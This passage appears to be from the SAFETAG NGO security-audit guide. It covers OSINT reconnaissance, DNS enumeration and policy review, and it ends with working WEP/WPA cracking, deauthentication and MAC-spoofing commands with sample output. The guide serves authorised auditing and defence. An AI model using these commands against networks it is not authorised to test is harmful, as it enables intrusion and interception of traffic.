• Mangle contacts into email addresses.
• Run modules that convert email addresses into full contacts.
• Run credential harvesting modules.

Reporting

• Export data for analysis.

[recon-ng][websitename] > use reporting/csv
[recon-ng][websitename][csv] >
[recon-ng][websitename][csv] > set TABLE Domains
TABLE => Domains
[recon-ng][websitename][csv] > set FILENAME /home/computer/.recon-ng/workspaces/websitename/Domains.csv
FILENAME => /home/computer/.recon-ng/workspaces/websitename/Domains.csv
[recon-ng][websitename][csv] > run
[*] 5 records added to '/home/computer/.recon-ng/workspaces/websitename/Domains.csv'.

Creating API Keys

• Bing API Key (bing_api) -
  • Sign up for the free subscription to the Bing Search API here: https://datamarket.azure.com/dataset/bing/search
  • The API key will be available under the "Account Keys" page.
• BuiltWith API Key (builtwith_api) -
  • Sign up for a free account here: https://api.builtwith.com/
  • Sign in to the application.
  • The API key will be available in the upper right hand portion of the screen.
• Google API Key (google_api) -
  • Create an API Project here: https://console.developers.google.com/project/
  • The API key will be available in the project management console
    • Click on the "APIs & auth" Menu
    • Click on the "Credentials" sub-menu
    • Click the "Create new Key" button under "Public API Access"
    • Click "Server Key"
    • Type your current ip-address into the text box.
    • Make sure you delete it after use.
• Google Custom Search Engine (CSE) ID (google_cse) -
  • Create a CSE here: https://www.google.com/cse/create/fromkwsetname
  • Type in a name
  • Click the "Proceed" button
  • Click "Setup" in the side bar.
  • Change the "Sites to search" drop-down from "Search only included sites" to "Search the entire web bit emphasize included sites"
  • Read here for guidance on configuring the CSE to search the entire web. Otherwise, the CSE will be restricted to only searching domains specified within the CSE management console. This will drastically effect the results of any module which leverages the CSE.
  • The CSE ID will be available in the CSE management console.
  • Click "Setup" in the side bar.
  • Click the "Search engine ID" button in the "Details" section.
• IPInfoDB API Key (ipinfodb_api) -
  • REQUIRES A PERMANENT IP ADDRESS LIKE A SERVER
  • REQUIRES A CUSTOM DOMAIN EMAIL (it rejects "free" accounts like gmail)
  • Create a free account here: http://www.ipinfodb.com/register.php
  • Log in to the application here.
  • The API key will be available on the "Account" tab.
• Shodan API Key (shodan_api) -
  • Create an account or sign in to Shodan using one of the many options available here: https://developer.shodan.io/
  • On the right side of the screen under "API Key" Click "Click here to create an API key."
  • The API key will be replace that text.
  • An upgraded account is required to access advanced search features.
• Twitter App API key (twitter_api) and (twitter_secret) -
  • Create an application here: https://apps.twitter.com/
  • The Consumer key will be available on the application management page.
  • The Consumer secret (twitter_secret) will be available on the application management page for the application created above.
• VirusTotal API Key (virustotal_api)
  • Create a free account by clicking the "Join our community" button here: https://www.virustotal.com/en/documentation/private-api/#
  • Log in to the application and select "My API key" from the user menu.
  • The API key will be visible towards the top of the page.

• Facebook API Key (facebook_api) - TBD

• Facebook Secret (facebook_secret) - TBD

• Flickr API Key (flickr_api) - TBD

• API's we won't be using
  • Jigsaw API Key: Costs $1,500/year
  • PwnedList: Costs Money
• LinkedIn API Key (linkedin_api) -
  • Log in to the developer portal with an existing LinkedIn account
  • Add a new application.
  • Click on the application name.
  • Add http://127.0.0.1:11777 to the list of "OAuth 2.0 Redirect URLs".
  • The API key will be available underneath the "OAuth Keys" heading.

• As of November 4th, 2017, the People Search API (required for all LinkedIn related modules) has been added to the Vetted API Access program. As a result, a Vetted API Access request must be submitted and approved for the application in order for the associated API key to function properly with the LinkedIn modules.

• LinkedIn Secret (linkedin_secret) - The Secret key will be available underneath the "OAuth Keys" heading for the application created above.

Foca Analyzer

FOCA Quick Guide

Requirements:

• FOCA executable
• Windows Environment (Virtualized)
• .NET Framework

Installing FOCA analyzer

• Download from FOCA website
• Install .NET Framework
• Extract FOCA zip file into a folder
• To launch, go to foca pro thenbin and select FOCA application

Features & Functionality

FOCA scanner has tons of great features from web searches and DNS searches as examples. To know more of functionalities, visit FOCA's website

Creating Your first Project:

To create a project in FOCA, click Project on the tab menu, and select New Project

There are few items to fill in FOCA:

• Project name: Name of your project
• Domain website: the Website of your target
• Alternative domains: for sub-domains, and other domains that your target own
• Folder where to save documents: Select any folder or create a folder for your FOCA results
• Project date: Date of your project (automatically filled up)
• Project notes: Any notes that you have for this particular project

After completing the forms, select the button Create

Scan and Search:

After saving your project, it will bring you to the main window. On the upper right hand corner of your screen, you will see the two settings:

• Search Engines: search engines you wanted to use (Google, Bing, Exalead)
• Extensions: Extension refers to file extensions (doc, docx, xls, xlsx etc) By selecting an extension, it will be included in the scan/search.

Click the Search All buttong below the Extension options to start scan.

Note: FOCA will give you a warning regarding the IP address of the target and it’s netrange owner. This will be added to the alternative domain.

Analyzing Public Documents:

The results of FOCA depends on the files/documents uploaded to the website that are "publicly available". There are situations, where an organization may not have any publicly available documents. If that is the case, move next to the Maltego assessment activity.

However, if your scan generates files/documents scanned, you can may analyzing and extract metadata from the identified files/documents.

Downloading Files:

After when the search/scan has completed, right-click on any file, (NOTE: you can start downloading files one-by-one, or all at once by using SHIFT+SELECT. you can only extract metadata of files that are already downloaded). If the target website contains a lot of files and documents available, you may want to download all the files all at once.

Extracting Metadata:

After selecting a file/s that is/are downloaded, you may right-click and select Download Metadata You may start analyzing the files one-by-one of all at once. To do this, first, download all documents. Then, right-click, select Extract all Metadata. After Extracting your metadatas you can now right-click again, and select: analzye metadata. (There’s a green button that will appear once a file has been downloaded and analyzed. It will show download progress bars for each individual files and the time it takes time to download)

Analyzing Reports and Findings

After downloading documents and extracting metadata, you may view the results on the left side pane of your FOCA. On the left pane, you will see the following options:

• Network
• Domains
• Roles
• Vulnerabilities
• Metadata

Under Metadata you will have two sub-menus, Documents and Metadata Summary. The Documents, option displays scraped metadata per document/file. However, on Metadata Summary option, you will have the following options:

• User
• Folders
• Printers
• Software
• Emails
• Operating Systems
• Passwords
• Servers

These information can then be added to your records and be used for other attack surface such as social engineering attacks.

Maltego

What is Maltego?

According to the Maltego's official website, they define maltego as: "An interactive data mining tool that renders directed graphs for link analysis. The tool is used in online investigations for finding relationships between pieces of information from various sources located on the Internet.

Maltego uses the idea of transforms to automate the process of querying different data sources. This information is then displayed on a node based graph suited for performing link analysis."

Maltego has may different uses:

• Information Gathering and Data Mining
  • Email addresses, Aliases, domain names, DNS records, IP addresses
  • Document and files
  • Affiliations
• Investigation and Threat Intelligence
  • Investigating targeted attacks
  • Analyzing malicious files

These are just some of the ways you can use Maltego. However with this guide, we will use Maltego for information gathering and data mining. The information we will find will later on be used in the following stages of audit/vulnerability assessment/penetration testing.

Maltego also has different versions:

• Maltego XL
• Maltego Classic
• Maltego CE (Community Edition)

For this exercise, we will be using the Maltego CE version.

Registration

Maltego is available in the latest release of Kali Linux. (See here) NOTE: To run Maltego, you first need to have an account. To register, click here. Consider carefully the operational security implications of this requirement, in particular if you use one account for multiple different audits.

Getting Started:

Before we proceed with this guide, let us first take a look on Maltego's 3 main important concept.

• Entity

  According to Maltego, "Entity is represented as a node on a graph and can be anything such as a DNS Name, Person, Phone number, etc. The Maltego client comes with about 20 entities targeted for use in online investigations, but you can also make your own custom ones."

• Transform

  Tranforms is defined as "a piece of code that takes one entity to another. It does this by querying a data source and returning the results as new entities on your graph. The data sources are places like DNS servers, search engines, social networks, WHOIS information, etc."

• Machines

  In Maltego, a machine can "a chain multiple transforms together to automate common/tedious tasks."

Running Maltego for the first time

To initialize Maltego, on your Kali Linux, click Applications > 01 - Information Gathering > Maltego. This will bring you to the "Home" screen of the Maltego application and will show you a list of available Transforms. Transforms are simply a set of activities that you can run against a specific target. We'll learn more of transforms in the following topics.

Creating a New Graph

To create a new graph where we can put our first task, click the Maltego icon on the upper left corner of your window, and click New. This will now open a blank screen, with the tab entitled New Graph.

Selecting Pallete Entity

Pallete is located on the left pane side called "Entity Pallete". This contains all the Entity that you can use depending on the activity that you are going to perform. For our exercise, look for the Domain entity pallete. Once you find it, drag it and drop it to the blank graph to the right. Now you have an entity on your graph. Try to double click the domain entity to rename it to your target (for this example, we can use paterva.com)

Choosing Transforms

Once you have edited your entity, you can right-click to open the Run Transform(s) option. You can see here all the available transforms you can use. (Depending on the transforms that you have installed)

For this exercise, click the + on the left side of PATERVA CTAS CE. This will give use 4 transforms:

• DNS from Domain
• Domain owner detail
• Email addresses from Domain
• Files and Documents from Domain

You can run each of this transforms individually, or you can click the >> icon to run All Transforms.

Once you click it, all Transforms will run on the paterva.com domain. This graph result will include:

• Sub-domains
• Email addresses
• Files and documents
• IP addresses
• Geolocation
• Domain registrants
• Telephone numbers
• etc

You can now then gather these results and use it for your next set of reconnaissance activity.

Recommendation

Website Footprinting

Summary

Using online tools as a starting point in assessing the auditee web application is a good way to expand online reconnaisance as well as start your vulnerability assessment. You can build a profile and a good understanding of the web application by identifying what comprises the web application and technologies behind. From there you can start your next move by putting together different strategies on conducting your vulnerability assessment.

For example, after discovering accessable web directories, you can then start looking for forgotten or abandoned files and applications that might contain sensitive information like (Passwords) or an outdated and vulnerable applications. Content management systems, while powerful, require ongoing maintenance and updates to stay secure. Quite often these (or specific plugins) fall out of date and become increasingly vulnerable to automated as well as targeted attacks.

Online tools offer ways of performing "passive" scans, in which your identity is hidden from the target organization, in cases where there are IDS/IPS, firewalls deployed. These should be used in conjuction with other outputs from reconnaisance to determine platforms and hosts which are out of scope.

Overview

• Determine the version of any content management system used by the organization
• Search for potential security vulnerabilities for that version.

Materials Needed

Considerations

Walkthrough

Before unleashing more advanced and powerful tools like OpenVAS, a few quick steps can help better guide your work. As a general note, surfing using a browser with at least NoScript enabled may help not only protect you, but may also help to reveal malware or adware infecting the websites.

Record core details about the website - determine the hosting provider, platform, Content Management Systems, and other baseline data. BuiltWith is a great tool. There are a few alternatives, including an open source tool, SiteLab. Note that BuiltWith is a tool bundled in recon-ng, but the output it provides is not currently stored in its data structures. These tools may also reveal plugins, javascript libraries, and DDoS protection systems like CloudFlare.

Tools

• BuiltWith
• Online Pentesting Tools
• Hacker Target

CMS Version Detection

Identification of CMS during web footprint can be done either using scripts and tools or using online services.

you can use certain websites to determine the type of CMS a target website is using:

• https://builtwith.com
• https://sitecheck.sucuri.net
• http://guess.scritch.org

For CMS systems, out of date components can mean well-known and easy to exploit by malicious actors.

Drupal For Drupal, try visiting /CHANGELOG.txt , which, if not manually removed, will reveal the most recent version of Drupal installed on the server. Other telltale signs depend on the specific Drupal release; http://corporate.adulmec.ro/blog/2010/drupal-detection-test-site-running-drupal maintains a detection tool.

Drupal 6.27, 2012-12-19
----------------------
- Fixed security issues (multiple vulnerabilities), see SA-CORE-2012-004.
Drupal 6.26, 2012-05-02
----------------------
- Fixed a small number of bugs.
- Made code documentation improvements.

Joomla For Joomla, default templates provide strong hints towards versions based on copyright dates. Specific versions can often be discovered using this guide: https://www.gavick.com/magazine/how-to-check-the-version-of-joomla.html

WordPress Wordpress sites tend to advertise their version number in the header of each webpage, such as

<meta name="generator" content="WordPress 3.3.1" />

There is a web-based tool with browser add-ons available here: http://www.whitefirdesign.com/tools/wordpress-version-check.html

Document your finding and list what type of CMS your target is using along with it's version. You can use this information in the next possible activities:

• Vulnerability Scanning
• Vulnerability Research

Recommendation

Most popular CMS platforms provide emailed alerts and semi-automated ways to update their software. Make sure someone responsible for the website is either receiving these emails or checking regularly for available updates. Security updates should be applied immediately. It is a best practice however to have a “test” site where you can first deploy any CMS update before attempting it on a production site.

For custom CMS systems, it is strongly advisable to migrate to a more standard, open source system.

An increasingly good practice is for organizations to take advantage of the "free" tiers of DDoS mitigation services, of which CloudFlare is probably the best known. A challenge of these free services can be that they have definite limits to their protection. With CloudFlare, organizations can request to be a part of their Project Galileo program to support at-risk sites even beyond their normal scope of support.

A community-based, open source alternative is Deflect, which is completely free for eligible sites.

Some of these services will be revealed by BuiltWith, but checking the HTTP Response Headers (in Chromium/Chrome, available under the Inspect Element tool, or by using Firebug in Firefox. See Deflect's wiki for more information.

Guide for NGOs about DDoS: Digital First Aid Kit

DNS Enumeration

Summary

DNS Stands for Domain Name Service. In a nutshell, what it does is translate hosts/computer's name into it's IP addresses. It provides a way to know the IP address of any given machine on the internet, with the corresponding URL, or domain. You can consider it as telephone directory of the Internet.

DNS enumeration is one of your initial steps in your overall vulnerability assessment and audit. It is one stage where it will allow you to discover more potential targets. Upon completion of this assessment stage, you may find issues such as leaked information caused by default settings and server misconfigurations. Along with these, you can also have a broader scope of targets, such as internal server IP addresses, company netblocks and domain/subdomain names.

DNS Enumeration can be accomplished with different number of tools along with different approaches. This guide will discuss some of the approaches and the tools required to perform each of the activities. You can perform DNS enumeration passively or actively, depending on your operational security needs.

Passive, or "indirect" approach refers to the enumeration process that doesn't send any traffic or packets from your machine, directly to your target. This can be done using 3rd tools such as online tools and cloud based scanners.

Active, or "direct" approach refers to sending DNS queries and enumeration tests directly to the target. Consider that traffic is send over the target which may leave traces or traffic logs coming from your source IP. Active techniques include Zone Transfer, Reverse Lookup, Domain and Host Brute-Forcing, Standard Record Enumeration (wildcard, SOA, MX, A, TXT etc), Cache snooping, and Zone Walking

Overview

• Using a variety of passive and active techniques, uncover as many domains/subdomains linked to the target organization as possible.
• Use these to advance other aspects of your work to discover additional credentials and potential vulnerable or outdated services.

Materials Needed

• System or VM running Kali Linux.
• Internet Connection (and possibly a VPN or tor setup)
• Target domain(s)
• Secure notetaking tool

Considerations

• These techniques can reveal your interest in the target organization to anyone in your network path, so consider using a VPN or tor to conduct searches.
• When performing "active enumeration" it is always good to ask to whitelisting your IPs whenever you perform assessments. This rules out the idea of attackers having able to avoid shunning. Whitelisting your IPs also removes false positive reports and inaccurate results
• It is important that we verify that we have the correct target domain(s) before proceeding with any of the scans/audits/assessments exercises within SAFETAG Framework. The last thing we wouldn't want to happen is to scan and enumerate target which is out of scope!)

Walkthrough

The flexibility of having multiple options in performing a DNS enumeration activity is the key for a successful enumeration. As a practice, comparing results can help in assuring that the information we gather is accurate. Your investigation may be blocked by CloudFlare, a popular DDoS protection service. "CloudFlair" provides some options in this case.

DNS Enumerations Tools:

Specific instructions for selected tools/techniques follows:

Passive: Third Party and Online Tools

Using 3rd party and online tools can help an auditor/tester in avoiding his/her machine to generate logs on the target's end. In cases where the target, or partner organization who requests for an audit/assessment has some security devices in place (IDS/IPS, Firewall etc.) Generating logs from your machine/network may result sometimes in our traffic getting blocked due to "automatic blocking" features in these security devices/appliances.

Passive tools include:

• Robtex
• DNSDumpster
• CentralOps Domain Dossier
• DNSSEC analyzer
• IntoDNS
• YougetSignal Reverse IP Domain Check

Active: DNSrecon

DNSrecon (available in Kali 2017 Release) is a powerful DNS enumeration script that can help and auditor in gathering information during the recon stage. This tool checks all NS records for Zone transfers, enumerate general DNS records for a given domain (MX, SOA, NS, A, AAAA, SPF and TXT). Performs SRV record enumeration and TLD (Top Level Domain) Expansion to name some.

This exercise will help you in performing some of the DNS enumeration methods using DNSrecon and generate information which you can add to your database to be used for other avenues of testing.

Perform basic DNS enumeration on target:

 [email protected]:~# dnsrecon -d <target domain>

Perform DNS Zone Transfer enumeration:

 [email protected]:~# dnsrecon -d <target.domain> -a
 [email protected]:~# dnsrecon -d <target.domain> -t axfr

Perform Reverse Lookup:

 [email protected]:~# dnrecon -r <start-IP-to-end-IP>

Domain Brute-Force:

 [email protected]:~# dnsrecon -d <target.domain> -D <namelist> -t brt

Cache Snooping:

 [email protected]:~# dnsrecon -t snoop -n Sever -D <Dictionary>

Zone Walking:

 [email protected]:~# dnsrecon -d <target.domain> -t zonewalk

Active: DNSenum

DNSenum, just like DNSrecon, is a tool designed to analyze DNS information of a specific DNS target. From zone transfer, hostname and subdomain dictionary brute force, reverse lookup service record and standard record query and top level domain name expansion, results are almost identical for both assessment tools.

You can use DNSenum from the Kali terminal and MSF Console platform as an auxilliary.

To access DNSenum, simply type the command dnsenum. (You can add -h for help options.)

[email protected]:~# dnsenum

The table below will help you get started with your DNS enumeration using dnsenum tool.

Active:DNS Zone Transfer

Active: MX Records

MX, or Mail Exchange, records are required to be public for any domain you wish to receive email through. These records can still reveal sensitive information about an organization's hosting set-up and office software in use through further scanning (see Vulnerability Scanning). MX Records can reveal vulnerable mail servers or information about other services hosted internally. Unless other assessments reveals specific vulnerabilities in e-mail services used, there is no specific action to take. If an orgnization is self-hosting email, it may be advisable to suggest outsourcing that if funds permit. While self-hosted email provides more control and potentially security, managing the security of the server is a complex job. Other mail services can provide some level of protection by being a first-pass check for spam and viruses, and (slightly) reducing the visibility of an organizational mail server.

[email protected]:~# host -t mx sample.org
sample.org mail is handled by 21 mail.sample.org

Determine the IP address of the mail server:

[email protected]:~# host mail.sample.org
mail.sample.org has address 256.0.0.3

Recommendation

DNS is inherently public information, but we can still do a lot of steps to secure any parts of it which are revealing more private information. Fortinet provides a set of good recommendations:

https://blog.fortinet.com/2016/03/10/10-simple-ways-to-mitigate-dns-based-ddos-attacks

If a zone transfer was successful, (most providers automatically limit anonymous zone transfers), you will need to work with their support team to prevent this, or switch to a different DNS provider. If your organization maintains its own DNS servers, the administrator of those servers should check the zone transfer policies to prevent anonymous transfers.

Identifying Informal Agreements

Summary

The activity aims to assess which kind of informal agreements regarding best practices and security directives are formulated, accessed, implemented and/or enforced across the organization

Overview

• Select a series of situations and operational aspects that could have associated some security agreements or policies
• Ask and discuss with the organization if there are organizational agreements regarding the situations and aspects presented
• Analyze the way these agreements are being transmitted and applied in practice
• Detect the potential gaps in terms of presence and pertinence of effective agreements
• Recommend the building of an strategy to develop, document and transmit as needed new or updated security agreements and/or policies

Materials Needed

• Materials for taking notes

Considerations

Walkthrough

1. Build a list of situations where security policies, if followed, would prevent or reduce the impact of a problem; ideally using the Threat Modeling exercise and inputs from Process Mapping, Capacity Assessment, and other methods and activities. These situations can be related to regular operations (looking for best practices) and risks (looking for security procedures).

For small and medium sized organizations, arrange group conversations around a few specific what-if scenarios (this can be integrated in with the Data Mapping or Process Mapping approaches).

Discussions can include:

• How passwords are created, used, and shared
• Who has access to what information (e.g. HR, finance, partners)
• Destruction/loss of office devices (fire, natural disaster, etc.)
• Lost devices (e.g. while traveling)
• Data breach impacting a cloud service used by the organization
• New people join or leave the organization

2. Meet with members of the organization and present to them the situations on the previous list, asking if there are some codes or agreements regarding security aspects of the situations presented, take notes of the responses and possible differences between the criteria or knowledge of the agreements. This could be explained by the lack of documentation and formal ways to transmit the agreements

3. Build a map of practices in three terms:

• small org - getting to shared agreements * Roundtable without auditor - short internal discussion * Run alongside threat ID / process mapping * funding and resources

• What practices are presumed to be in place (e.g. everyone thinks everyone else is using unique passwords)
• What is being applied in practice (with their possible variations among staff members)

• What needs to be updated or defined

Recommendation

There must be a good understanding of the organizational capacity and commitment to implementing and maintaining formal security policies. Based on this assessment, consider beginning with more informal agreements among staff which still help centralize their approach to security and improve their preventative measures and ability to respond to incidents that is easy and effective to adopt. Encourage a "testing" phase of these practices for the organization to then begin formalizing the ones which work and test new approaches for any which did not continue.

Security policy review

Summary

The activity aims to understand the organization internal security policy context, looking for existing policies, understanding how they translate into practice and/or are enforced, and evaluating them and detecting potential improvements or updates.

Overview

• Review written policies with security implications
• Identify any areas for improvement in existing policies
• Leveraging output from Process Mapping, Capacity Assessment, and Data Mapping; identify policy gaps

Materials Needed

Considerations

Walkthrough

1. Ask for documentation - this may come out of Capacity Assessment work
2. Review documentation and compare with existing baselines, and against identified vulnerabilities - do these policies help mitigate risks? (see references)
3. Propose a map like the one in the Identifying Informal Agreements activity

Recommendation

There must be a good understanding of the organizational capacity and commitment to implementing and maintaining formal security policies. Based on this assessment, consider beginning with more informal agreements among staff which still help centralize their approach to security and improve their preventative measures and ability to respond to incidents that is easy and effective to adopt. Encourage a "testing" phase of these practices for the organization to then begin formalizing the ones which work and test new approaches for any which did not continue.

Conduct Interviews

NOTE: Covered in full under Capacity Assessment

A Day in the Life

NOTE: Covered in full under Organizational Device Assessment

Wireless Range Mapping

Covered in full in Physical and Operational Security

This component consists of wireless scanning and wireless signal mapping. It is useful for organizations with offices in shared spaces/buildings/apartment complexes or near locations where an adversary could easily "listen" to network traffic. In conjuction with Monitoring Open Wireless Traffic exercise, it can also identify devices using that network. It is useful to do this in parallel with Office Mapping to build a more comprehensive view of the information assets of the organization.

• Identify and verify the network(s) belonging to the organization
• Create a map or photos indicating the range of each relevant wireless access point.

Monitor open wireless traffic

Covered in full in Physical and Operational Security

Each wireless device maintains a "memory" of what networks it has successfully connected to. When it is connecting to a network, it sends out "probes" to all of the networks it has in this memory. It is important to note that this data gets broadcast widely, and can be collected without any network access, only proximity to the device.

These network probes can often contain names (especially from mobile phone tethers), organizational affiliations, device manufacturers, and a mixture of other potentially valuable data (home network names, recent airports/travel locations, cafés and conference networks). If there are many networks in the office's vicinity, this activity can also help identify the specific office network (if there is any doubt). In many cases, an organization may not want the name of their wireless network to be associated with their organization, but it may be revealed by this additional meta-data.

Beacons can "de-anonymize" an obfuscated network name as well as provide rich content for social engineering attacks. This provides an only-lightly-invasive introduction to discuss the trackability of devices, particularly mobiles and laptops.

• Scan for wireless networks nearby, identify (and confirm) the office network(s).
• Monitor traffic of that network and capture potentially sensitive metadata (wireless security settings, beacons, and MAC addresses).
• Research likely device hardware using MAC addresses.
• Do the staff devices leak sensitive metadata?
• What can be determined about the organization based on broadcast wireless data?

Network Access

Summary

This activity helps auditors to test the strength of defenses the organizations' network has in place to protect their local area network. This component consists of gaining access to the local area network through a wireless access point and unsecured physical channels (such as an ethernet jack).

Overview

• Determine the security of the wireless access point (WAP).
• Gain access to the organizations Wireless network access.
• Test unused ethernet ports for live network connectivity.
• Find out how guest access is managed

Note: Cracking wireless passwords often take a huge amount of time performing, and the same results for the audit and organizational buy-in can be had simply by showing how password cracking works, and how far outside of the office the wireless network can be seen. Once an organization is using vulnerable authentication method, you can flag it right away as "finding". Given that the recommendations are often the same (move to WPA2 (and WPA3 as available), disable WEP and WPS access, provide a separate guest network, etc.), this should rarely be used during an audit (but is a useful skill to practice and understand how it works). If you do choose to use this during an audit, be aware that many of the stps disrupt network traffic, and success with WPA2 password cracking is by no means guaranteed, so can backfire.

Considerations

Note: This section is one of the few sections where the SAFETAG audit does go through attack scenarios, from attempting to "break in" to the wireless network to testing exposed ethernet jacks for connectivity.

The reasons for this are threefold. First, access to an organization's internal network tends to reveal sensitive data and "shadow" infrastructures (such as dropbox usage) that lead to many recommendations to improve access control and discussions of the value of defense in depth. Second, the specific act of breaking the wifi password allows for a discussion on password security without attacking any specific user's password. Finally, with wireless networks treated as equivalent to wired networks in many offices, reminding the organization that wireless networks extend beyond the physical walls of the office is useful in discussing password rotation and guest network policies.

Once you have access to the network, you need to first document how you managed that and share it with the hosts. This is a great moment to discuss passwords in many cases.

• Confirm that all devices you are accessing/scanning belong to the organization.
• Clarify timing and seek permission with staff - some activities can tax the network or cause disruptions.

Walkthrough

Breaking into network requires specialized tools as well as a significant amount of time in capturing authentication packets, and replaying those packets back to the wireless access point.

MAC filtering is a common, but easy to bypass security measure.

WEP (Wired Equivalent Privacy) has been found with several vulnerabilities. The RC4 algorithm that it uses to generate the keystream for encryption is subject to two separate weaknesses.

On the other hand, WPA/WPA2 (Wi-Fi Protected Access) is also found to be vulnerable to attack known as KRACK(Key Reinstallation Attacks) as well as offline (high speed) attacks against the password itself. WPS, a common "feature" that is on by default on WPA networks, has significant vulnerabilities.

WPA3, a new standard, is built to disallow offline password attacks, making it significantly harder to break in to that WPA2 networks. As it becomes available and devices support it, it should be a priority upgrade if wifi network security is a concern.

WEP Cracking

The auditor can be guaranteed to access a WEP network with sufficient time by cracking the WEP key.

• Start the wireless interface in monitor mode on the specific AP channel
• Use aireplay-ng to do a fake authentication with the access point
• Start airodump-ng on AP channel with a bssid filter to collect the new unique IVs
• Start aireplay-ng in ARP request replay mode to inject packets
• Run aircrack-ng to crack key using the IVs collected

References

For educational purposes, if no WEP network is available, you can use this pre-built airodump-ng capture file and skip the airodump-ng and aireplay-ng packet injection steps.

• Tutorial: “Simple WEP Crack” (Aircrack-ng Wiki)
• Tutorial: “Simple Wep Cracking with a flowchart” (Aircrack-ng Wiki)
• Documentation: “Aircrack-ng” (Aircrack-ng Wiki)
• Documentation: “Aireplay-ng” (Aircrack-ng Wiki)
• Documentation: “Airodump-ng” (Aircrack-ng Wiki)

MAC Filtering Bypass

Open and MAC-address-filtered wireless access points are not only open to anyone within range to join and listen in to, but also do not provide protection to those on the network itself, even if they do not "broadcast" their name. These may seem like great ways to prevent unauthorized users from accessing your network without resorting to passwords, but they are trivial to overcome.

Auditing MAC address filtered access point

The auditor can easily gain access to an open or MAC address filtered access point.

• MAC-Address Spoofing
  • Start the wireless interface in monitor mode
  • Identify MAC addresses that are on the whitelist

airodump-ng

* Change our MAC address to one that’s on the whitelist

ifconfig mon0 down
macchanger -m [MAC ADDRESS IDENTIFIED] mon0
ifconfig mon0 up

References

• Tutorial: “Bypassing MAC Filters on WiFi Networks” (techorganic.com)

WPA Cracking

The organization’s wireless Local Area Network (WLAN) protects the network and its users with WPA encryption. This is an important security measure, and a WPA-protected wireless network is much safer than an unencrypted “open” network or a WEP-protected network. (WEP is fundamentally flawed, and extremely simple attacks have been widely known for over a decade.) However, the ease with an attacker could guess the WPA key, or “WiFi password,” is a serious issue, particularly considering its importance as an essential perimeter control. An attacker who gains access to the wireless LAN immediately bypasses many protections that network administrators, and other users of the office network, often take for granted. Put another way, anyone able to guess the WPA key is immediately “inside the firewall.”

Using a laptop and a wireless card with a standard, internal antenna (or using a customized smartphone or other small device), an attacker could easily position themselves close enough to the office to carry out the first phase of this attack, which would only take a few minutes. The second phase, which is supposed to be the difficult part, could take even less time. From the privacy of their own home or office, the attacker could use a minimally customized password dictionary to guess the WPA key .

Materials Needed

• For the (most common) WPA password-based attacks, an already-prepared dictionary of words to use to attack the password will be required. See the Password Strength activity for guidance on dictionary preparation.

Instructions

An attacker can crack the office’s WPA key in approximately with a short and minimally customized password dictionary based on open information about the organization and basic word collections.

Step 1: The attacker customizes their WiFi password dictionary, adding phrases related to the subject: organization name, street address, phone number, email domain, wireless network name, etc. Common password fragments are included, as well: qwerty, 12345, asdf and all four-digit dates back to the year 2001, for example, among others. The attacker may then add hundreds or thousands of words (in English and/or other relevant languages).

See the Password Strength exercise for details on password dictionary buidling and usage.

Step 2: The attacker would then begin recording all (encrypted) wireless traffic associated with the organization’s access point:

$ sudo airodump-ng -c 1 --bssid 1A:2B:3C:4D:5E:6F -w sampleorg_airodump mon0

 CH  1 ][ Elapsed: 12 mins ][ 2012-01-23 12:34 ][ fixed channel mon0: -1
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 1A:2B:3C:4D:5E:6F  -70 100    12345    43210    6   1  12e. WPA2 CCMP   PSK sampleorg
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 1A:2B:3C:4D:5E:6F  01:23:45:67:89:01    0    0e- 0e   186    12345
 1A:2B:3C:4D:5E:6F  AB:CD:EF:AB:CD:EF    0    1e- 1      0     1234
 1A:2B:3C:4D:5E:6F  AA:BB:CC:DD:EE:FF  -76    0e- 1      0     1122
 1A:2B:3C:4D:5E:6F  A1:B2:C3:D4:E5:F6  -80    0e- 1      0     4321

wifite is also useful for this step, and claims to automatically de-auth (step 3).

Step 3: Next, the auditor forces a wireless client, possibly chosen at random, to disconnect and reconnect (an operation that is nearly always invisible to the user).

In the example below, AB:CD:EF:AB:CD:EF is the MAC address of a laptop that was briefly disconnected in this way.

$ aireplay-ng -0 1 -a 1A:2B:3C:4D:5E:6F -c AB:CD:EF:AB:CD:EF mon0

 15:54:48  Waiting for beacon frame (BSSID: 1A:2B:3C:4D:5E:6F) on channel -1
 15:54:49  Sending 64 directed DeAuth. STMAC: [AB:CD:EF:AB:CD:EF] [ 5| 3 ACKs]

The goal of this step is to capture the cryptographic handshake that occurs when the targeted client reconnects. Try using different clients if the first one doesn't work, or try (physically) moving around.

This handshake does not contain the WPA key itself, but once the the complete handshake process has been seen, the auditor (or a potential attacker) can leave the vicinity and run various password cracking tools to try and discover the password. While a complete password cracking tutorial is out of scope for SAFETAG documentation, below are three strategies:

Step 4: The auditor attempts to discover the WPA password.

A good wordlist with a few tweaks tends to break an unforunate number of passwords. Using a collection of all english words, all words from the language of the organization being audited, plus a combination of all these words, plus relevant keywords, addresses, and years tends to crack most wifi passwords.

    $ aircrack-ng -w pwdpairs.txt -b 1A:2B:3C:4D:5E:6F sampleorg_airodump*.cap

For WPA captures, John can either feed in to an aircrack process or attack a capture directly. For captures, you first have to convert the .cap file (from wireshark, wifite, airodump, etc.) to a format that John likes. The Jumbo version we use has conversion tools for this available:

  $wpapcap2john wpa.cap > crackme
  $./john -w:password.lst -fo=wpapsk-cuda crackme

Results

Successful password cracking via piping these into aircrack-ng:

 Opening sampleorg_airodump-01.cap
 Reading packets, please wait...
                                 Aircrack-ng 1.1
                    [00:00:05] 9123 keys tested (1876.54 k/s)
                           KEY FOUND! [ sample2012 ]

      Master Key     : 2A 7C B1 92 C4 61 A9 F6 7F 98 6B C1 AB 53 7A 0F
                       3C AF D7 9A 0C BD F0 4B A2 44 EE 5B 13 94 12 12

      Transient Key  : A9 C8 AD 47 F9 71 2A C6 55 F8 F0 73 FB 9A E6 1D
                       23 D9 31 25 5D B1 CF EA 99 2C B3 D7 E5 7F 91 2D
                       56 25 D5 9A 1F AD C5 02 E3 2C C9 ED 74 55 BA 94
                       D6 F5 0A D1 3B FB 39 40 19 C9 BA 65 2E 49 3D 14

      EAPOL HMAC     : F1 DF 09 C4 5A 96 0B AD 83 DD F9 07 4E FA 19 74

The fourth line of the above output provides some useful information about the effectiveness of a strong WPA key. That rate of approximately 2000 keys per second means that a full-on, brute-force attack against a similar-length key that was truly random (and therefore immune to dictionary-based attacks) would take about 70^9 or 20 trillion seconds, which is well over 600,000 years. Or, for those who favor length and simplicity over brevity and complexity, a key containing four words chosen from among the 10,000 most common English dictionary words would still take approximately 150,000 years to crack (using this method on an average laptop).

